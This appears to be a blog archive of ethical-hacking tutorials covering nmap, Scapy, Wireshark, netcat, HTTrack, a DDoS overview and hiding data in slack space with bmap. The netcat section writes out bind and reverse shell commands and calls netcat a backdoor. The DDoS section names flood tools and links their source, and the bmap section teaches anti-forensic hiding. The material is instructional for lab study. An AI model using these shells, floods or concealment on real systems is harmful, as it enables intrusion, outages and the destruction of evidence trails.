Archive for the ‘Ethical Hacking/Anti-Forensics’ Category

From the manual entry :

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.”

Here are few common ports used by TCP/IP to map packets to services :

20 – FTP (File Transfer Protocol, data transfer)
21 – FTP (File Transfer Protocol, control)
22 – SSH (Secure Shell)
23 – Telnet
25 – SMTP (Send Mail Transfer Protocol)
80 – HTTP (Hyper Text Transfer Protocol)
110 – POP3 (Post Office Protocol, version 3)
139 – Net BIOS
443 – HTTPS (Hyper Text Transfer Protocol secure)

Well, lets explore this tool…

  • nmap takes host name as its argument. Use help option to know more.
    #nmap –help or #nmap -h

    Screenshot from 2013-11-07 13:12:01

  • Scan a single host (IPv4)
    Scan (SYN scan, by default) a host using the following command,
    #nmap host-name or #nmap host-ip
    For verbose output, use -v option, for more verbose output, use -vv option.

    Screenshot from 2013-11-08 00:34:27

  • Scan multiple IP address
    scan a range of IP address using
    Or scan the entire subnet using,
    you can also use wildcard,
    #nmap 192.168.1.*

    Screenshot from 2013-11-08 00:09:40

  • Stealth Scan / Half Open Scan.
    This sends SYN packet. If port open, the target sends SYN/ACK packet. Knowing that the port is open, Nmap will send RST packet to break the connection. This scan still be detected. Use -sS option to do this scan.
    #nmap -sS

    Screenshot from 2013-11-07 21:48:04

  • TCP Connect / Full Open Scan.
    A complete 3-Way handshake is established. Nmap sends SYN packet, if the port is open, the target acknowledges with SYN/ACK packet, and nmap completes the connection with the ACK packet. Use -sT option for this scan.
    #nmap -sT

    Screenshot from 2013-11-07 21:48:52

  • Scan for UDP.
    To scan all the UDP ports use -sU option.
    #nmap -sU

    Screenshot from 2013-11-07 22:19:52

  • To know the version the services are running, use
    #nmap -sV

    Screenshot from 2013-11-07 21:43:49

  • Or go for Aggressive scan, use -A option for this. It is same as using -O -sV options together.
    #nmap -A
  • ICMP scan. Just scan, don’t ping
    #nmap -PO
  • Fast scan.
    #nmap -F

    Screenshot from 2013-11-08 01:05:14

  • Specify port(s) to scan.
    You can specify the port that yo wish to know the status of. Say for an instance, port 80,
    #nmap -p 80
    Or you can scan for more than one port,
    #nmap -p 80,443
    Or give a range,
    #nmap -p 20-100

    Screenshot from 2013-11-08 01:10:46

  • To see the host interfaces and routers
    #nmap –iflist

    Screenshot from 2013-11-08 01:09:24

  • Detect the Operating system (TCP/IP fingerprinting)
    Use -O option,
    #nmap -O
    If this doesn’t work, ask nmap to guess for you.
    #nmap -O –osscan-guess

    Screenshot from 2013-11-08 00:40:39

  • Trace the Packets
    #nmap –packet-trace
    Screenshot from 2013-11-08 01:07:46

Scapy is a powerful packet manipulation tool, network scanner, packet generator, packet sniffer, etc. Scapy uses python interpreter as a command board. So you can perform any python operations to design your packets. You can install scapyt by typing the following in your terminal (Ubuntu).

#apt-get install python-scapy

Start Scapy by running the following in your terminal (you should be a root user), once your done with your installation.

#scapy -s mysession

Screenshot from 2013-09-27 01:51:15

Vital commands to begin with :

ls() – Lists supported protocol layers.

Screenshot from 2013-09-27 02:09:26

If a protocol layer is given as parameter, it lists the fields and types of fields associated with that particular protocol layer. Lets try, the Internet protocol layer.
And the result would be something like this…

Screenshot from 2013-09-27 02:12:35

lsc() – Lists some user commands. If a command is given as parameter, its documentation is displayed.

Screenshot from 2013-09-27 02:10:27

conf – This contains the configuration.

Screenshot from 2013-09-27 02:14:30

Fine, what are we waiting for? Lets go ahead and create our own packet. Lets create a TCP/IP packet.

>>> i=IP() #create IP packet
>>> i.dst="" #destination =
>>> i.src="" #source =
>>> i.ttl=128 #time to live = 128
>>> #show the created packet
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
frag= 0
ttl= 128
proto= ip
chksum= None
>>> t=TCP() #create TCP packet
>>> send(i/t) #send the packets, '/' is used as a separator

Screenshot from 2013-09-27 02:05:26

Now the packet is sent. But how do you confirm? Well, we know Wireshark! Go ahead and start your Wireshark, and resend the packet to actually capture your packet. Here is what I captured,

Screenshot from 2013-09-27 02:07:16

Wireshark (originally named Ethereal), is a free and open source packet/network analyzer. It is used to capture packets in real time and are displayed in human-readable format. Wireshark provides GUI. For Command Line Interface you can go for TShark. Download Wireshark from the official website.

Once done with the installation, launch Wireshark.

Screenshot from 2013-08-31 20:17:33

1. Capture/Sniff packets :

Choose an interface to capture the packets from the traffic. You can choose an interface from the interface list, or,
select capture->interfaces

Screenshot from 2013-09-06 11:37:14

Choose an appropriate interface. I am using Wireshark inside my virtualbox. So, I will be choosing eth1 to capture the packets from. You can choose any interface. Once that is done, to start capturing your packets, hit start or,
select capture->start
At first, it has no packets. So it will be blank.

Screenshot from 2013-09-06 11:37:57

Lets initiate a connection. I will request the info.php page (refer LAMP). So, let me open my browser and type in, This gives me the info page like so,

Screenshot from 2013-09-06 11:41:53

Lets see the back-end now. Your Wireshark window will show up few packets that it captured during our http request.

Screenshot from 2013-09-06 11:43:50

By default, Wireshark displays packets in three panels/sub-windows. Starting from the top,

  • Packet List : The packets that are captured is listed. Each line indicates an individual packet, with brief details. This includes, packet number, time, source ip, destination ip, the highest-level protocol in use, length of the packet and information. Wireshark use colors for easy identification of the type of traffic at a glimpse. By default, green is TCP traffic, light blue is UDP traffic and so on. And black indicates TCP packets with problem.

    Screenshot from 2013-09-06 11:52:04

  • Packet Details : This gives the information right from the physical layer to the network layer. Information here is the header information. For the selected packet in the packet list, a copy of Ethernet frame and IP datagram information is displayed.

    Screenshot from 2013-09-06 11:46:27

  • Packet Bytes : This window displays the entire contents of the captured frame including Layer 2 data (of the OSI), in both ASCII and hexadecimal format.

    Screenshot from 2013-09-06 11:47:11

2. Packet Analysis :

Filtering Packets :

Say you are working on specific packets type, or packets from a particular IP etc, the concept of filtering the packets comes handy. Say you want to inspect only http packets, you can filter them out by typing in http in the filter space. And the result would be something like this…

Screenshot from 2013-09-06 11:44:51

Follow TCP Stream :

To view the complete conversation between the client and the server, right click on a particular packet and select Follow TCP Stream.

Screenshot from 2013-09-06 12:19:50         Screenshot from 2013-09-06 12:18:39




Netcat, the Swiss-Army Knife, is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. Its functionality range from port scanning to backdoor!!  Read more.

Alright, lets have some fun with this tool.

1. Port Scanning :

We can use netcat for Port scanning to  know the available open ports on the target machine.

#nc -v 10-1000 is the target’s IP and 10-1000 indicates the range to be scanned. In my case port 80 is open. That is http port.

2. Banner grabbing :

Lets go ahead and connect to the http server. I am using Backtrack 5 r3 on the virtual machine, to connect to my local machine Ubuntu 12.10 (with ip: running Apache server. So, issue the following command,

#nc -v 80

Once connected lets request something, say, HEAD / HTTP/1.1

We got the banner, and we got something in return!! The Apache server is up!! This is good. We can find exploits for this later, and can be helpful in various website attacks. If you are lucky, the version of Apache server might be returned.

Screenshot from 2013-08-30 01:23:26

3. How about a rudimentary chat using netcat? Lets do this!

Here one machine must be a listener. i made Ubuntu the listener.

#nc -lvp 4444

Meaning, listen verbosely on port 4444

Now coming to backtrack, lets get connected,

#nc -v 4444

Once you press the return key, the connection will be established.

Screenshot from 2013-08-30 01:51:44

But nothing much happens right? Nothing happens, until you start typing… Go ahead and type in your message… You can have a complete rudimentary chat…

Screenshot from 2013-08-30 01:53:18

4. File transfer :

Not just chat, you can send almost any data using netcat… Alright lets send a file then.

Lets send a file from Ubuntu to Backtrack.

In Ubuntu :

Create a file.

#touch /home/file

#echo “This is an example file” > /home/file

#cat /home/file

Lets listen on port 4444 and send the file /home/file (use < operator)

#nc -lvp 4444 < /home/file

In Backtrack :

Lets receive the file.

#nc v 4444 > /home/file

Once you hit the return key, the transfer of file is complete, but you won’t get any message on successful transfer. But we know the file is right there. Lets check it out..,

#ls /home/file

#cat /home/file

Screenshot from 2013-08-30 02:24:55

5. Bind/Reverse shell :

Lets get to the actual power of netcat.

->Binding a shell :

Ubuntu : Lets listen on port 4444, once connected, lets execute our bash (-e /bin/bash, if your are experimenting with windows machine, bind the command prompt, -e cmd.exe).

#nc -lvp 4444 -e /bin/bash


#nc -v 4444

->Reverse shell :

Here we are going to reverse a shell, where netcat can be used as a backdoor. Lets send the bash to a listening machine.

In Ubuntu :

Again, lets listen on port 4444

#nc -lvp 4444

In Backtrack :

Lets bind bash to netcat.

#nc -v 4444 -e /bin/bash

Once the connection is established, go ahead and play around with commands in Ubuntu…

I used few commands and created few files…

Screenshot from 2013-08-30 02:51:37

Here is the netcat Cheat sheet!!

Other alternatives : Ncat, Socat, Cryptcat (Netcat clone, twofish encryption), SBD (Secure backdoor, another Netcat clone).

Here, check out my videos that demonstrates the above netcat explanation.

HTT rack is a free off-line browser. It allows you to download a site to a local directory (make a page-by-page copy of the website). This enables us to mine the target website off-line. Download HTT rack.

Or install using the command (in linux) :

$sudo apt-get install httrack

Screenshot from 2013-08-22 02:23:03

Invoke HTT rack.


Name your project. I named it as example.

Enter base path. The path where your mirror must reside. I have given it as /home

Enter the URL/URLs of which you are creating the mirror(s).

Enter 1 to create the mirror web site(s). Along with this there are number of other options, you can just explore.

Screenshot from 2013-08-22 02:27:13

You can use proxy. I am not using any, but you might need while doing a pen test on real websites.

Launch the mirror. Wait for it to complete.

Screenshot from 2013-08-22 02:28:23

Once done, a directory with the name you mentioned in the provided path is created.

Lets check that.

#cd /home; ls

#cd example; ls

Screenshot from 2013-08-22 02:31:04

Here we go… A directory is created in the name of the URL provided. Change to that directory and check the files. This should give you the complete mirror of the website.

Screenshot from 2013-08-22 02:33:17

Distributed Denial of Service abbreviated as DDoS is a type of DOS attack (an attack designed to render a computer or network incapable of providing normal services), where a large number of compromised systems are used against a targeted system with an intention to make the machine or network resources/services unavailable to its users. The compromised systems are meant to form a dosnet (botnet meant for DDoS attack). The master controller controls these bots and at a specific time the bots are programmed to make a number of requests to provide a resource/service which results in slowing down the servicing speed of the target  and might lead to complete exhaustion.

There are lot of methods of DDoS  attack. I will be explaining SYN flood and Ping of Death.

SYN flood : It exploits a flaw in the TCP three-way handshake connection sequence. Where, the attacker spoofs the source IP and floods the target with SYN packets. The victim machine, acknowledges these SYN messages with SYN-ACK to the client (the spoofed IP), but the spoofed IP never responds to these SYN-ACK with ACK because it has not started the handshake with SYN. The server will wait for the ACK for a specific time, since it is flooded with large number of SYN packets leaving half-open connections, it will saturate resources on the server resulting in a denial of service to legitimate traffic.

Ping of Death (PoD) : Its all with reassembling!! The attacker crafts the ping larger than the normal ping, and many systems don’t like being pinged with a packet greater than 65536 bytes (IPv4 packet size).  A packet of such size is fragmented and sent to the target. When the target reassembles the packet, a buffer overflow can occur, which often causes a system crash. Ping of Death.

Few popular piece of softwares to perform DDoS attack :

TFN2K (Tribe Flood Network) written by Mixter. Methods : ICMP flood, SYN flood, UDP flood and Smurf attack. Source code.

Trinoo or trin00 is a DDoS tool. Methods : UDP flood. It is famous for allowing the attackers leave a message in a folder called cry_baby. Source code.

Stacheldraht written by Random for Linux and Solaris systems. Methods : ICMP flood, UDP flood and Smurf attack. Stacheldraht has features of Trinoo combined with TFN and adds encryption. Source code.

Another such tool used by the famous Internet activists or  hactivists (group), Anonymous, to accomplish DDoS attack is Low Orbit Ion Cannon (LOIC), where the people or anons joined voluntary botnets to attack websites from the Church of Scientology (Project Chanology), to attack the websites during Operation Payback etc. LOIC is an open source project and the source code is available in the github.


==>Hiding the data in the slack space using bmap tool.

Download bmap and install it.

Installing the tool.

-Extract the files from the archive once done with the downloading.

#tar -xovf bmap-1.0.17.tar


-The make utility automatically determines which pieces of the program (usually large program) need to be recompiled.



-Create a symbolic link /sbin/bmap. Because we want to access bmap from any directory. since it is linked to sbin, this can be achieved.

#ln -s /pathname/bmap-1.0.17/bmap /sbin/bamp

-This is specified in the PATH.

#which bmap

-Now we are done with the installation, and our tool should be ready to explore.

#bmap -help



Writing into the slack space.

-Create a file, tst.txt

#touch tst.txt

#echo “Contents of the actual file goes in here” > tst.txt

-Check the size using ls command.

#ls -l tst.txt

-Check the slack.

#bmap –mode slack tst.txt

-Write into the slack space.

#echo “contents to be written to the slack goes in here” | bmap –mode putslack tst.txt


-Check the size using ls command. It remains the same.

#ls -l tst.txt